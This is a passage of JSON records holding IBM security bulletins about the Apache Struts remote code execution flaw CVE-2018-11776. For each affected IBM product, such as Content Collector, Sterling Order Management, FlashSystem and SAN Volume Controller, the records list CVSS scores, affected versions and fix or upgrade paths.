{"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-18T01:45:50", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem 840 and 900", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-02-18T01:45:50", "id": "7C42BBDFFC97D2C8E3BEC4BE79A23F40E78C2650B91FD356C831E42D0B7EE5EF", "href": "https://www.ibm.com/support/pages/node/735035", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:45:56", "description": "## Summary\n\nContent Collector for Email, File Systems, Microsoft SharePoint and IBM Connections has addressed publicly disclosed vulnerability found by vFinder: Eclipse Jetty.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: **Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Content Collector for Email - 4.0.1 \nIBM Content Collector for File Systems - 4.0.1 \nIBM Content Collector for SharePoint - 4.0.1 \nIBM Content Collector for IBM Connections - 4.0.1\n\n## Remediation/Fixes\n\n**Product** | **VRM** | **Remediation** \n---|---|--- \nIBM Content Collector for Email | 4.0.1 | \n\nUse IBM Content Collector for Email 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for Email 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for File Systems | 4.0.1 | \n\nUse IBM Content Collector for File Systems 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for File Systems 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for SharePoint | 4.0.1 | \n\nUse IBM Content Collector for SharePoint 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector for SharePoint 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \nIBM Content Collector for IBM Connections | 4.0.1 | \n\nUse IBM Content Collector IBM Connections 4.0.1.5 [Interim Fix 003](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.5&platform=ALL&function=fixId&fixids=4.0.1.5-IBM-ICC-IF003&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.6 [Interim Fix 00](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FInformation+Management%2FContent+Collector&fixids=4.0.1.6-IBM-ICC-IF001&source=SAR&function=fixId&parent=Enterprise%20Content%20Management>)[2](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.6&platform=ALL&function=fixId&fixids=4.0.1.6-IBM-ICC-IF002&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.7 [Interim Fix 001](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.7&platform=ALL&function=fixId&fixids=4.0.1.7-IBM-ICC-IF001&includeRequisites=1&includeSuperse>)\n\nUse IBM Content Collector IBM Connections 4.0.1.8 [Interim Fix 007](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Enterprise+Content+Management&product=ibm/Information+Management/Content+Collector&release=4.0.1.8&platform=ALL&function=fixId&fixids=4.0.1.8-IBM-ICC-IF007&includeRequisites=1&includeSuperse>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-11-12T12:55:02", "type": "ibm", "title": "Security Bulletin: Content Collector for Email, File Systems, Microsoft SharePoint and IBM Connections are affected by a publicly disclosed vulnerability found by vFinder: Eclipse Jetty", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-11-12T12:55:02", "id": "BF4651008A331C7D796A1E09F830D542352CF251871DBEED396D2CE654058F5A", "href": "https://www.ibm.com/support/pages/node/730391", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:46:41", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 9.5.0 \n\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP3_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP6_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>)**_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-17T15:25:01", "type": "ibm", "title": "Security Bulletin: Apache Struts Vulnerability Can Affect IBM Sterling Order Management (CVE-2018-11776)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-10-17T15:25:01", "id": "20D334DF630C3C7B5490CC97E9EB2E76B4108FD56753DB19039AF6E0DE79CB63", "href": "https://www.ibm.com/support/pages/node/730273", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:44:34", "description": "## Summary\n\nThere is a vulnerability in Apache Struts which the IBM FlashSystem\u2122 V840 is susceptible. An exploit of that vulnerability (CVE-2018-11776) could make the system susceptible to attacks which could allow an attacker to execute arbitrary code on the system.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nStorage Node machine type and models (MTMs) affected:9840-AE1 and 9843-AE1\n\nController Node MTMs affected: 9846-AC0, 9848-AC0, 9846-AC1, and 9848-AC1\n\nSupported storage node code versions which are affected\n\n * VRMFs prior to 1.4.8.1\n * VRMFs prior to 1.5.2.1\n\nSupported controller node code versions which are affected\n\n * VRMFs prior to 7.8.1.8\n * VRMFs prior to 8.1.3.4\n\n## Remediation/Fixes\n\nMTMs | VRMF | APAR | Remediation/First Fix \n---|---|---|--- \n \n**Storage nodes**:\n\n9846-AE1 & 9848-AE1\n\n**Controller nodes**:\n\n9846-AC0, 9846-AC1, 9848-AC0, & 9848-AC1\n\n| \n\nCode fixes are now available, the minimum VRMF containing the fix depending on the code stream:\n\n_Fixed Code VRMF_\n\n1.5 stream: 1.5.2.1\n\n1.4 stream: 1.4.8.1\n\n_Controller Node VRMF_\n\n8.1 stream: 8.1.3.4\n\n7.8 stream: 7.8.1.8\n\n| N/A | FlashSystem V840 fixes for storage node are available @ IBM's Fix Central \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-18T15:05:01", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Struts affects the IBM FlashSystem V840", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-02-18T15:05:01", "id": "47D48C5A9F3802E168F3775B67FEF0A4B25692C1BE0EB29698F35ECDF8F0CD7B", "href": "https://www.ibm.com/support/pages/node/735023", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:35", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Spectrum LSF Explorer.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Spectrum LSF Explorer 10.1\n\nIBM Spectrum LSF Explorer 10.2\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nIBM Spectrum LSF Explorer\n\n| \n\n_10.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**IBM Spectrum LSF Explorer10.1 & 10.2**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Explorer installed environment.\n 3. How to find replace files location\n * Navigate to Explorer installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Spectrum LSF Explorer", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "EF22A73E167DAD8921F1B5310AD0D0D34493E613208B9FFE7D6DF59B309A1D62", "href": "https://www.ibm.com/support/pages/node/729453", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T21:47:34", "description": "## Summary\n\nPublic disclosed vulnerability (CVE-2018-11776) from Apache Struts affects IBM Platform Application Center.\n\n## Vulnerability Details\n\n## CVEID: [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \nDESCRIPTION: Apache Struts namespace code execution\n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>[ ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/148694>)for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nPlatform Application Center 9.1.5\n\nPlatform Application Center 9.1.4.2\n\nPlatform Application Center 9.1.4.1\n\nPlatform Application Center 9.1.4\n\nPlatform Application Center 9.1.3\n\nPlatform Application Center 9.1.2\n\nPlatform Application Center 9.1.1\n\nPlatform Application Center 9.1\n\n## Remediation/Fixes\n\n_<Product_\n\n| \n\n_VRMF_\n\n| \n\n_APAR_\n\n| \n\n_Remediation/First Fix_ \n \n---|---|---|--- \n \nPlatform Application Center\n\n| \n\n_9.1.5_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.4_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.3_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.2_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \nPlatform Application Center\n\n| \n\n_9.1_\n\n| \n\n_None_\n\n| \n\n_See fix below_ \n \n**Platform Application Center 9.1.5, 9.1.4.2, 9.1.4.1, 9.1.4, 9.1.3, 9.1.2, 9.1.1, 9.1**\n\n 1. Download Apache Struts 2.5.17 from following link, <https://cwiki.apache.org/confluence/display/WW/S2-057>\n 2. Replace the downloaded files (struts2-core-2.5.17.jar, struts2-json-plugin-2.5.17.jar and struts2-spring-plugin-2.5.17.jar) into Application Center installed environment.\n 3. How to find replace files location\n * Navigate to PAC installed directory\n * run command \u2018find . -name \"*struts*.jar\"\u2019\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-09-25T13:15:02", "type": "ibm", "title": "Security Bulletin: Public disclosed vulnerability from Apache Struts affects IBM Platform Application Center", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-25T13:15:02", "id": "8D92F3D2DF6A11349A2815C9DBFEE8CEFA4D5B034DC3477EAF30879571A440D4", "href": "https://www.ibm.com/support/pages/node/729451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T18:05:45", "description": "## Summary\n\nA vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 and 9100 family products. Apache Struts is used in the Service Assistant GUI. The Service Assistant CLI is unaffected.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2018-11776](<https://vulners.com/cve/CVE-2018-11776>) \n**DESCRIPTION: ** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when using results with no namespace and its upper action configurations have no wildcard namespace. An attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/148694> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM FlashSystem 9100 Family \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud\n\nAll products are affected when running supported versions 7.5 to 8.2.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher:\n\n7.5.0.13\n\n7.8.1.8\n\n8.1.3.3\n\n8.2.0.2\n\n8.2.1.0\n\n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+%282145%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+%282076%29&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem 9100 Family Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+9100+family&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>)\n\nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## ", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-29T01:48:02", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Struts affects IBM SAN Volume Controller, IBM 